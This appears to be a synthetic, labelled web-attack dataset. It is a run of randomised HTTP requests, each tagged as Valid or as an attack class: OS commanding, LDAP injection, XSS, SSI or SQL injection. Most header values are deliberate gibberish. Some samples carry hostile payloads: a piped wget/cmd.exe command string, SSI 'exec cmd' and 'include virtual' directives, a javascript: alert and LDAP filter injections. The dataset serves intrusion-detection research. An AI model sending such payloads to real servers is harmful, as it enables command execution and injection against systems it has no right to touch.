GET /imu_Sa1Vi@vy6KYSe/7onn/9_9L@Z0noSw/8arh/yHcUtllQC7mnunDdna.asmx?ryal=cesock_streamnf%7Cpsh&koaXi=nvjnu1ssba9aatH&lahn=j200w&uinubadicra=802&r0szaiSteelte=490173&dow=%7CnpsEo8oo&otwtlouteO3tg=nn&fdklzgi=3mo2d&hormHaroiand=eJtMv0&n7rwc=6773985 HTTP/1.0
Host: www.s5ioptucos.org:7
Connection: close
Accept: text/xml
Accept-Charset: iso-8859-9;q=0.5, windows-1253;q=0.2, x-mac-chinesetrad;q=0.2, us-ascii, macintosh;q=0.3
Accept-Encoding: *
Accept-Language: t-ads
Cache-Control: max-age=8005
Client-ip: 32.181.97.184
Cookie: Zhg=1eAdreThEae;OnEhase=62096553;nhsiel3stspils=061637
Cookie2: $Version="3"
Date: Tue, 31 May 05 05:28:19 UTC
ETag: W/"RoZFqETobkw2sCRg8"
Expect: 100-continue
From: hsdsttm4@ahcqn.net
If-Modified-Since: Sat, 15 Jul 06 11:32:05 UTC
If-Unmodified-Since: Thu, 04 Mar 10 10:09:20 UTC
If-Match: *
If-None-Match: "L0QIQBwOSqfZc-ZD5v2"
If-Range: "cZDH7i6UU0kr_vw"
Max-Forwards: 6
MIME-Version: 2.0
Pragma: 4sdls=j7
Proxy-Authorization: oefiaV tstleraA=ieooeay
Authorization: Digest nonce
Range: 5476-50235,729359-196
Referer: /Eilrbz.css
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: nfeweue/4.2
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4261x691
Via: 9.0 www.Necn.html, 5.4 93.49.32.237:67489
Transfer-Encoding: gzip
Upgrade: imy6ei/5.1, rfee/6.2, egoe/6.4, tizE/1.8, 9wsmHe/9.2
Warning: 403 120.108.130.1 "ai8tfnnlo4okAislt" "Wed, 10 Jan 07 06:01:10 GMT"
X-Forwarded-For: 53.152.98.70
X-Serial-Number: 28548763
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28153
Start - Id: 42818
class: OsCommanding
POST /olroole3rSehogetcr/i7I.nsf? HTTP/1.1
Content-Length: 190
Content-Language: qptttm,j8,h2ddw
Content-Encoding: identity
Content-Location: http://www.enojekdd.st/ce5if/8gdO/tNoGesC/sSldoC.png
Content-MD5: dEVjdHJJY242dHVzMHRtdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Jun 09 14:16:13 UTC
Last-Modified: Wed, 23 May 07 02:23:16 GMT
Host: 26.215.129.214
Connection: ciniaie
Accept: image/*
Accept-Charset: euc-tw;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=829
Client-ip: 114.218.58.189
Cookie: Ndmv=r;tyrohzc=iptvvyu
Cookie2: $Version="5"
Date: Wed, 03 Dec 08 18:17:43 CET
ETag: "5ZPilOmFYaosnwTxq"
If-Modified-Since: Fri, 18 Mar 05 05:04:36 UTC
If-Unmodified-Since: Tue, 18 Aug 09 19:48:14 GMT
If-Match: "itmYRfSEF_OuuO0xH"
If-None-Match: "DCbs8O6ffKpmP88g"
If-Range: *
Max-Forwards: 0
Pragma: gNl=eeior
Proxy-Authorization: Digest nonce
Authorization: Basic Zm40ZXJ5YTpldGVlZWR1YQ==
Referer: /eeu5nXn3/ia4yc/mgUlcei/adbSims.zip
TE: deflate,chunked;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: awr9Oh (at_YenaQ)
UA-Pixels: 0367x479
Via: dnod/4.5 239.147.85.240:119, 1.0 www.1my6a.tiff
Transfer-Encoding: gzip
X-Forwarded-For: 95.96.130.184
X-Serial-Number: 328285479278468
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

eT=4window.open$q a]8ayf2elocationmshutdown&m8ZGz=neo<igroup byls~ps o o(passwdio&7uPswget=73.225.82.51   |    cmd.exe /s&FHd8=n&DLsW=8ma/&LrJdNeval=tiohtpassnsd+b ifhtet1m

End - Id: 42818
Start - Id: 10587
class: Valid
GET /mvedcn49obN/lRdHdARAj1dwUeKw/eoeI8iejcbpyaraimio/sAFTFrfMz_/tivedse0T/eaRy/Ru/ilwv/bYd/nlfdxvJ0QtSVPV.mspx?zweFB=O2sS8qwbiceS0ange&@@q_CjBvrpQB=95&mem6=bioRUt&datghnmzezngnoc=meu++eisohu%40iha&mF9lFxHwhere=g HTTP/1.1
Host: www.btcS.de:80
Connection: o9lbz
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 245.176.39.251
Cookie: wLirfateed=mrCE2@m;bklfumE3lhehian=updatejlte0httpscopys;eiNniwsit=ohtaccesso;lygeyttochsw=re%d  ls bw+-eq 29;rntven=493831638;elhDDrDeou=200345
Cookie2: $Version="6"
Date: Fri, 09 Feb 07 18:43:22 CET
ETag: W/"lOOiGyG8HGcYRzud"
Expect: 100-continue
From: mohdrcal@8y7xh.de
If-Modified-Since: Sun, 14 Oct 07 18:57:43 CET
If-Unmodified-Since: Sat, 20 Dec 08 15:05:15 CET
If-Match: "xk_BiZWMzF.Y9hsWwr"
If-None-Match: "XWJ@K2Vq-vR61aFZR"
If-Range: *
Max-Forwards: 9134
MIME-Version: 2.1
Pragma: uiiSb=gDNciTib
Proxy-Authorization: Basic dU9vZGF4bGg6ZE9nc3I=
Authorization: aul1l tueuente=ydtg
Range: 63612-482,79-314,-3432
Referer: /89nTeld/o3w1ip/siRccket/iFatbte.aspx
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/1.1 (X11; U; Solaris 1.2; lt-tv; rv:1.3.3) Gecko/76518268
UA-CPU: x86
UA-Disp: 4066,570,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 170x2008
Via: 4.4 135.238.254.201
Transfer-Encoding: deflate
Upgrade: Een/6.5, oelp/1.9, pepbl/8.4, hcTat/2.7, Uihj/0.1
Warning: 834 www.tef1xm.html "Tynnwvdgbhlmdt4" "Sun, 05 Mar 06 10:41:18 UTC"
X-Forwarded-For: 170.174.211.23
X-Serial-Number: 340706
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10587
Start - Id: 37315
class: LdapInjection
GET /Cun6srne/78niojraar/nGli/wntaj/Knullqpserviceses/fTh6BHQrlZYqdsDkyrWM/ew8hP0wM.aspx?Jstdin91formjYJO=7orlsiwai HTTP/1.0
Host: 101.98.116.132
Connection: at2e2
Accept: audio/basic
Accept-Charset: utf-8;q=0.2
Accept-Encoding: compress;q=0.7, deflate;q=0.5
Accept-Language: rlee)(   |    (am=*)
Cache-Control: no-transform
Client-ip: 163.171.38.168
Cookie: e8iddu=488;eeeitatJReaoioS=806
Cookie2: $Version="651"
Date: Wed, 19 Mar 08 14:35:53 CET
ETag: "SqzTXG3cL_LrKvg7K"
Expect: 100-continue
From: rtec@se2cehaQn.com
If-Modified-Since: Fri, 20 Feb 04 08:16:42 GMT
If-Unmodified-Since: Wed, 15 Feb 06 10:51:58 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8901
MIME-Version: 4.6
Pragma: hnno13=t
Proxy-Authorization: Basic bmNlYWVudW06b2lvb2Fh
Authorization: Digest nc=f26c3C64
Range: 1-568088,6956-8,075-
Referer: http://www.lxeomn.org/ssbs/stoteer.swf
TE: chunked;q=0.4,trailers,gzip
Trailer: Host
User-Agent: w5it (a@.54N; ey@_SY)
UA-CPU: StrongARM
UA-Disp: 050,5091,32
UA-Color: color16
Via: 7.0 71.227.47.29:9742
Transfer-Encoding: gzip
Upgrade: cgnl/2.0
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 97.235.140.149
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37315
Start - Id: 1860
class: Valid
GET /epsfpln4sseuege/xeieaapfyTacqin/stref/1uNyEiveasaoovtasatm/4o4s/ucFTRjlNeAyw/ntetreOnw/x3gV7TYElJtvj1a3Fj/IIcnNVfjsf/qsef.cfm?n5ihRmid=119862&ne=Ohra&ee=Oohhnw+sih&iP9ttrer4innaa=i%29%25uwherec%24n+8du+lr&tten=h&zekihbsapjo=49&94kteuDtw=ypmhuegp&lS6=085339236&ZCttAtSsylanfi2=588 HTTP/1.0
Host: www.lItNo.be
Connection: 4tsdnm
Accept: */*;q=0.4
Accept-Charset: koi8;q=0.2, windows-1252;q=0.7, x-mac-chinesetrad;q=0.3, windows-1254, x-mac-arabic;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: i='dwidbE'
Client-ip: 188.102.222.214
Cookie: bbrasw1=1;Q1y2updateJEd7P=lQc0fs@ZcFOI;ena7enc=94630664;ye4=9798;ori=629108
Cookie2: $Version="36"
Date: Sat, 25 Feb 06 15:35:14 GMT
ETag: W/"1vcB05ZQJrPJeyLPkpwL"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Fri, 27 Oct 06 03:07:31 GMT
If-Unmodified-Since: Wed, 11 Mar 09 12:27:11 UTC
If-Match: "DxFsdKCunsNM6HXDY"
If-None-Match: *
If-Range: "fVuQgLN0Hzm-llB"
Max-Forwards: 4
MIME-Version: 9.5
Pragma: flrhs0sa=ao
Proxy-Authorization: NTLM ZWhpaWFlc2VqZVBUb25iZlkyMG5pVGFhVGxoYW85b2FobHNpdTNOdGNyeWFzcmRp
Authorization: NTLM cUh0bWdzaHRkTG5mc2ZEZmV6aXR4b2Vobm9vaG5pYWEyZUM=
Range: -34624,61390-055,75119-
Referer: http://www.ifhsew.uk/ynJn/qw0aai/u9ri/yeerxtem.js
TE: trailers
Trailer: Range
User-Agent: evrmij5t/9.7.5.7.2
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 063x9656
Via: FTP/8.3 42.154.138.130, 6.9 www.ce1n7ni.css, OfcnE/1.9 www.fmrsoise.jpg
Transfer-Encoding: identity
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 195 79.247.8.91 "v9omtairreetwatxt" 
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1860
Start - Id: 3580
class: Valid
GET /eteh/esyneaxmqvpa/Lmykngmr/ewe/yHu/SQ-6XmetaRcopenobgsoundB-/snWduiee/tOOrR8EIzD/o.XJJq/wer7Uv_TmAk/fdlriAo9ou1jT.htm?so29dyunda=8796872314&i4l=64&9QgHREMGOreplaceGA=88&oA=eE1eeae%28ntrcpa&acce=4304515&Kc9q6=t1RczMD.RD HTTP/1.1
Host: www.b5haon5.cz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 148.242.32.96
Cookie: sgolc=5752;gusaetedaEphorx=2cetweaiax2c3leru
Cookie2: $Version="01"
Date: Sat, 28 Feb 09 02:35:31 GMT
ETag: W/"AKGnIz5yWE.QHcj4QR"
Expect: tamv=ox85;rgonuno=TtT9
From: ic6er@ToeneiH.uk
If-Modified-Since: Wed, 28 May 08 15:17:42 CET
If-Unmodified-Since: Fri, 09 Jan 04 18:29:11 GMT
If-Match: "cSHNqUhumLCbi-rcnM"
If-None-Match: "STUORZf_Nc.kHTWzap"
If-Range: Fri, 20 Jan 06 22:05:17 GMT
Max-Forwards: 839
MIME-Version: 5.0
Pragma: i=ao
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: Basic b3NzZTppdWFpZVk=
Range: 285-321592,-0,1-98
Referer: http://eictby.ch/1iOott.nsf
TE: gzip;q=0.7,chunked;q=0.0
Trailer: Pragma
User-Agent: aUlAZS8qS. http://www.wlunNmb.de
UA-CPU: MIPS
UA-Disp: 481,666,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 047x6463
Via: HTTP/3.5 www.ctoo.png, 8.7 118.239.134.250
Transfer-Encoding: compress
Upgrade: ijka/6.6
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3580
Start - Id: 48014
class: XSS
GET /5Rxdo2boordaexta4l/sepugdE/ari0Gecybhucetweostl/idWvRUe8je.ad/u_ecTU9E2bey229z/V2utDxfJ327freplace/0.NKfOHyW/n@u.html?1ag3rereilned=tb%2Fot%26%7E%3DhteEresHhbt6&8t2=mntallI&raa1s69dustt=javascript%3A+++alert%28+%22+++8Riid.aftd%22%29 HTTP/1.0
Host: www.und6.net
Connection: c9dac8
Accept: video/mpeg
Accept-Charset: utf-7;q=0.5, iso-8859-9;q=0.4, x-mac-cyrillic, x-mac-roman
Accept-Encoding: identity, compress
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 94.214.147.18
Cookie: rsla=tetOVBCtow6J;Drs=95;ebaixo=d1R5pwMoPR;wehoskh=182381955;tinnTbtDoini=ckxao6tr7Nt
Cookie2: $Version="1"
Date: Fri, 30 Dec 05 11:41:36 GMT
ETag: "mJXtu2Cs.k@CXBnl"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Sun, 04 Jul 04 22:13:25 CET
If-Unmodified-Since: Sat, 29 Sep 07 21:16:05 GMT
If-Match: *
If-None-Match: *
If-Range: "47gEF8Pfmlmsd6bmYoZ"
Max-Forwards: 8
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: uedrde k86eh=jiih
Authorization: Basic bmxhaWtFZmc6dG5iZ25kbw==
Range: 5-,0-4,-81
Referer: /esrra/eiyar9/e1aa/koiri/aewnxh.js
TE: trailers,deflate;q=0.2,trailers
Trailer: Range
User-Agent: Mozilla/5.7 (compatible; Konqueror/5.1; Mac OS X; eptgseiafe)
UA-CPU: MIPS
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9754x5278
Via: HTTP/2.2 195.251.247.54, 9.5 www.nwBry.htm, 5.4 www.qottglE.htm
Transfer-Encoding: gzip
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48014
Start - Id: 37736
class: LdapInjection
GET /rhtu9Nldvlebiyrgfec4/titefVn2ragKaaKrehd/@UaSQO/ahFbodyxR_-QAccUscript.js?epwOeytDetsxn=c%5Dcc&xne1RDneEcI=1lZ14D496o&oh7h=3&processing-instructionsdJ=ch+-%3CltmpdCv%26evfh&KEfM=%29+++%28%7C+%28displayName%3Dhad*%29+%28name%3D++++had*+++%29%28mail%3Dhad*++++%29 HTTP/1.1
Host: www.bsatuclu.ch
Connection: ttlava
Accept: video/*, text/*
Accept-Charset: x-mac-japanese;q=0.7, windows-1250;q=0.9, utf-8;q=0.4, x-mac-icelandic;q=0.8
Accept-Encoding: *
Accept-Language: erevca-tk;q=0.3, rady-I7, 4io-hAbb, gve-sohdr;q=0.4
Cache-Control: 4s='a'
Client-ip: 136.48.47.50
Cookie: ioirui=0t
Cookie2: $Version="7"
Date: Thu, 30 Apr 09 07:02:49 CET
ETag: W/"bCfqrlXCud@@Yi6"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Wed, 27 Oct 04 03:11:24 GMT
If-Unmodified-Since: Sat, 18 Oct 08 13:14:19 CET
If-Match: "ZU107W6HC9QbDAzi6um4"
If-None-Match: *
If-Range: "5rLgSkRYRNIlYyAp_ik"
Max-Forwards: 06
Pragma: emtm1i='niroRl'
Authorization: Basic RWltZ3pzMG86ZWdlaTA=
Referer: http://itsa9F.uk/cObf/cnet/tsdlWei.fgf
Trailer: Date
User-Agent: Mozilla/1.2 (Windows; U; Win 9x 1.9; up-nM; rv:7.3.7) Gecko/87128709
UA-CPU: x86
UA-Disp: 756,0789,32
UA-OS: Solaris
Via: 3.1 www.otamen9.js, HTTP/0.6 www.erohT9Nt.shtml, FTP/6.8 122.121.127.181
Transfer-Encoding: deflate
Upgrade: 4da/3.4
Warning: 069 www.lmgThl1.html "siohotdtta4mee" "Sat, 10 Jan 09 23:15:18 UTC"
X-Forwarded-For: 33.253.224.201
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37736
Start - Id: 40557
class: SSI
GET /n2./2eps8nffcwaiatvwtcbr/eM8ca8F76HA7@3gqPyX/6tnvfa/ermwonertstiRa/qVqZe85zX@ot/fl3aAnUt/hpTOTyMu/eTLformHHf/deei2/iB18A.htm?zyqodna=endjSan2frln&OLWmH7=xw%40samlocation%2BEwp-4nods%29h&bfdpfoA5ot=%3C%21--+++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&NoinsgHsezt=e&omhrmeerr1we2s7=s%25usxml%7ErP%7Ce6lyr&nieeurotwhtN=fnrnn%40rElapns&NuZincludevallj=trkfoyconhsi&lteeimtHEl=2613&oiu=srntBht3&9ieOyiraez2=dLyqGnwc1f&hLsou9eet=9irifh&aet4=aiqnulltc%25ii HTTP/1.1
Host: 74.160.141.207
Connection: deohn
Accept: audio/*;q=0.8
Accept-Charset: iso-2022-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: fn6boo='tl'
Client-ip: 99.30.78.189
Cookie: Btieo5m0iaae=eed;Sokdi=i;oyelh=0Yrpositione
Cookie2: $Version="29"
Date: Tue, 17 Feb 04 22:42:56 UTC
ETag: "ssglHMX_9cM_DOyMAcT"
Expect: 100-continue
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Tue, 25 Sep 07 23:30:35 UTC
If-Unmodified-Since: Mon, 12 Feb 07 22:37:23 UTC
If-Match: "hxoHHeG8389Ni63eBJ"
If-None-Match: *
If-Range: Tue, 31 Oct 06 03:30:01 UTC
Max-Forwards: 09
Pragma: tep='t4G'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest nc=04bCfCaa
Range: 092301-3,261-278,-586839
Referer: /cdyhuil0.cfm
TE: gzip
Trailer: Pragma
User-Agent: Mozilla/4.8 (X11; U; Solaris 7.6; hd-im; rv:8.0.7) Gecko/48721558
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 3.6 www.hIralId.jpeg, mdita/8.9 137.17.67.11, 7.2 140.235.79.246
Transfer-Encoding: ett6sa; qEtleoeo=7aldsea
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 62.56.145.236
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40557
Start - Id: 13231
class: Valid
GET /services_/pel0_DDicp2/gmtNoZUFW6D-O2Vf/etxLendnuEzIiosceGyh/5Oeo/nvdlBMgrAURLt72QYU/shl/F1sock_streamXCKDeU0agHKN8/izfuyCDB1OYjTCnc/GfrNmnioasax0kpispde.php3?ngvrzboi=ocBxmpM&eb=nbInsrdlswXif&iSh9CG9F=iwceeetecho+&e0IvZy2=5940491&ca=13934&I@22hkV@3QW=%2Fo+uygoptd%29&yutniln=+%25Qilnnresy&llrsplxr=m%3Bkeo%28&shi=tmneiheKui3h1stylen&SPL5IlGrmF=a5execeeiscT&wleETsy9t5siIia=sBM3MY8bRhhS&nfpo=8743805&rcphIq4@sSn=nAFYM&I_8qstyle1wp-form=vH%403G4R6L HTTP/1.1
Host: www.bnbynt.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, gzip;q=0.1, deflate
Accept-Language: bm1f-n1rr;q=0.5, r-ao;q=0.3, Tani-o, 4n67H-lk
Cache-Control: max-stale=427
Client-ip: 93.188.236.120
Cookie: 1af9L7crwinnthlike=dHtxecyhxmle;iQsahh=aDWwzm3N
Cookie2: $Version="9"
Date: Mon, 22 Feb 10 24:32:33 UTC
ETag: W/"D2173GLOjOcj7Deb"
Expect: daeda
From: n7Oyrrss@th5Bs.cz
If-Modified-Since: Wed, 28 Feb 07 11:31:14 CET
If-Unmodified-Since: Sat, 15 Oct 05 13:13:21 CET
If-Match: *
If-None-Match: *
If-Range: "4js@aSx7aE_I6kT1LgI"
Max-Forwards: 6136
MIME-Version: 3.0
Pragma: ltondh=z
Proxy-Authorization: oltt icps=utniXm
Authorization: 1rsMut ot8ob=edsii
Range: 16-5
Referer: /2Rdhsn/Iseb/foCess.avi
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/5.7 (compatible; Konqueror/0.5; Open BSD i586; swoei; ceadye; siIditipba)
UA-CPU: Sparc
UA-Disp: 2503,069,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0644x4793
Via: 9.0 40.178.192.119, 8.6 www.nilibdg.shtml:1006
Transfer-Encoding: identity
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 652 www.rk2uis6.htm:23049 "elri5reurr" 
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13231
Start - Id: 10414
class: Valid
GET /aktcehjtwn/2wiod/rwieeirsnEotEEnoeti/sEsuib/eytro5vzeaelse/atd.bin?s8at=dl&ZV6zgnm=mEhuisvx8+rieenl&hSea9ri=ocuh9Te%29%2Feet%7E&jNO4Fq=idudh--bx3&toimpntbmhag=486511083 HTTP/1.1
Host: 239.251.236.151
Connection: hxd2s
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 167.81.230.241
Cookie: xecMXChLOF=554345;wMlrrkert2iphi=h.oSF4SqrPvi;linputlsUFm8tcH=p3YwZ6MQisi
Cookie2: $Version="2"
Date: Tue, 23 Jun 09 04:07:03 GMT
ETag: "GfcGhNtO9Dp@cKZXz@J"
Expect: 2lra=9b0eae5n
From: orksp@rBr6etaim.de
If-Modified-Since: Sun, 01 Mar 09 13:03:39 CET
If-Unmodified-Since: Wed, 02 Dec 09 15:28:55 UTC
If-Match: *
If-None-Match: "XTq9LOyy4SECsbz0Z7"
If-Range: Sat, 05 Jul 08 12:47:50 CET
Max-Forwards: 0323
MIME-Version: 2.9
Pragma: l5si=sai
Proxy-Authorization: 2tht ejer=oT7xhiau
Authorization: Digest nonce
Range: 5-355295,61313-1,05930-37268
Referer: http://Eaiiw.fr/lP5r/ehhom/mrobtt/uoinai.htm
TE: gzip,gzip;q=0.1,deflate;q=0.6
Trailer: From
User-Agent: RosoRla
UA-CPU: StrongARM
UA-Disp: 1729,6694,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 413x0477
Via: 4.5 www.osooz.js, r15/3.3 www.zseau.jpeg, dsh3o/6.5 www.WHNto6.css
Transfer-Encoding: identity
Upgrade: eso/3.5, ddji/0.2, bfcnj/3.8, ofsuw6/8.7
Warning: 149 www.pwoBteRd.js "729ikaci" 
X-Forwarded-For: 248.234.188.76
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 10414
Start - Id: 27520
class: Valid
GET /aJ7TQmPr-xIypj6It/eniqia/WfZ5s4processing-instructionBDxQ/HRhttp39N/XB9OSUoZ58AlRsamx/NbVze8/zDnalugz8Vo2qE.html? HTTP/1.1
Host: 180.49.107.31
Connection: Sowxc
Accept: */*;q=0.6
Accept-Charset: windows-1258;q=0.5, gb2312;q=0.0, cp-950;q=0.6
Accept-Encoding: 
Accept-Language: tahcae-tttnsbg, ood-hiiete;q=0.6, z-deellct
Cache-Control: no-store
Client-ip: 34.117.164.116
Cookie: tinsrehoagmreor=x(oroa;ku6almr5tqtzm=envnexec r;drop@t3db=32;Letgwe1dmfl3sae=2675;see=3hd5Nidrafacat;qidnInU09=a4vDB6ONb
Cookie2: $Version="1"
Date: Sat, 05 Feb 05 06:56:06 CET
ETag: "p7VzHMhO8c9vL12v9qK"
Expect: me45h5b
From: Ifxyn@cystcefu.uk
If-Modified-Since: Sat, 04 Jun 05 02:44:44 CET
If-Unmodified-Since: Fri, 25 Dec 09 23:36:25 GMT
If-Match: "Xid2zeqVhT8xnbo7"
If-None-Match: *
If-Range: Sun, 16 Nov 08 20:34:16 GMT
Max-Forwards: 3524
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest qop=CeGosd
Authorization: Digest opaque="lter7X"
Range: 895579-,54531-,8-
Referer: /aaEb/sauv.tiff
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/7.4 (X11; U; Linux i386 2.8; e1-ht; rv:0.7.0) Gecko/15287011
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5041x3321
Via: HTTP/1.9 www.ebfi.gif, 4.1 173.60.9.56
Transfer-Encoding: deflate
Upgrade: ieiie/4.6, kord/5.1, Nat/2.2
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 102.128.80.116
X-Serial-Number: 713179267523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27520
Start - Id: 39293
class: SSI
GET /iiteoeisH4r/FfCtmr/xHn7Nl3u_QvYN/eEPXi0viRApCn/ui48spU4UNdmq-zaZc/tHEd9I_@HwQQi6/svDK/e4iDtuenuddbneernwcr/aSy4LcYqTevnrvKi.6rK/aR54_orOWudi6.jpg?qrsueerag=nGqoKAsAoVE&eoitwcdmtucaldt=aei&iG0ashfsqeo=pnnfWtif&ocyslz6dan5acdo=046&eehpbam3=pmnuo&nMM9u=hdcopyEi&epnTiwaoR=i1Gxx8AByoe&nnodereplaceroURnY=etstdinqe%3Dlst8+t%25O+uf%5D&uocct=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&rfumiieemTflw=tjhimenme8tiwn7 HTTP/1.1
Host: 108.134.189.215:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, compress;q=0.4, gzip;q=0.7, identity
Accept-Language: nth5Tr-woxm4t;q=0.5, cl-ysst
Cache-Control: a=gl70sb
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="390"
Date: Wed, 18 Feb 09 18:02:44 CET
ETag: W/"9ib8ik4X3d-J0zUTbY"
Expect: 100-continue
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Sat, 17 Jan 09 22:55:53 GMT
If-Match: *
If-None-Match: "Ohb_@MSYNk.0vicdi"
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 469
MIME-Version: 6.8
Pragma: ieyern=w
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: Digest nc=e472deD1
Range: 7-228,-05193
Referer: /rmne/axg78sl7/prAmotd.wmn
TE: trailers,chunked;q=0.6
Trailer: Expect
User-Agent: Mozilla/8.2 (Windows; U; Win98 2.6; o6-ri; rv:9.1.3) Gecko/03933063
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 573x190
Via: HTTP/8.7 www.lins5.gif, 9.7 www.yle0anc.png:2
Transfer-Encoding: deflate
Upgrade: m0oet/4.8
Warning: 243 www.sr5ots.htm "h5poe8s" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 729426151535484
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39293
Start - Id: 39873
class: SSI
GET /aiariagn9/0te4GQNJdqYgz3PhFCUi/bcfmgr7K1es/V5I06ovJbEE/rONkS8PcFM6HUHY@/Efopen/sOj1aa/gAuqahci/whereCVjnull/2hltET1lfu5h/tOEDb.swf?toAue9=nX&tKsahi0fanetg=e5maiedrokNxUE&jedars2=510&@VaYwindow.openxWZ=9eUh&oc5itceoeAsfgOE=i9lp&ih=lEftrxe7pwLhr&Ate=iDeBHAZ&slt=c%3C HTTP/1.0
Host: 121.53.250.204
Connection: close
Accept: audio/*;q=0.2, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: <!  #<!--     #exec cmd="id"-->
Accept-Language: t-ainna;q=0.2, orsun-fctrg;q=0.6, q2Rnw-ieuni, ea-ocieId2
Cache-Control: min-fresh=8437
Date: Thu, 18 Sep 08 13:30:24 UTC
If-Unmodified-Since: Mon, 12 Jan 04 07:28:22 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Nov 05 23:03:51 GMT
Max-Forwards: 15
Authorization: NTLM aHRlOEg3cGthbHRybG1vc2d0ZG5xdGVlYWFIdGRUZ2VN
Referer: http://www.zpzqetg.gov/tg4b/aeSo/Rtemh4.swf
User-Agent: tvqHFU http://www.erR1.be
Via: 2.6 www.bossio.png, HTTP/6.4 150.5.223.67
Upgrade: ehegr/0.3

null

End - Id: 39873
Start - Id: 35230
class: SqlInjection
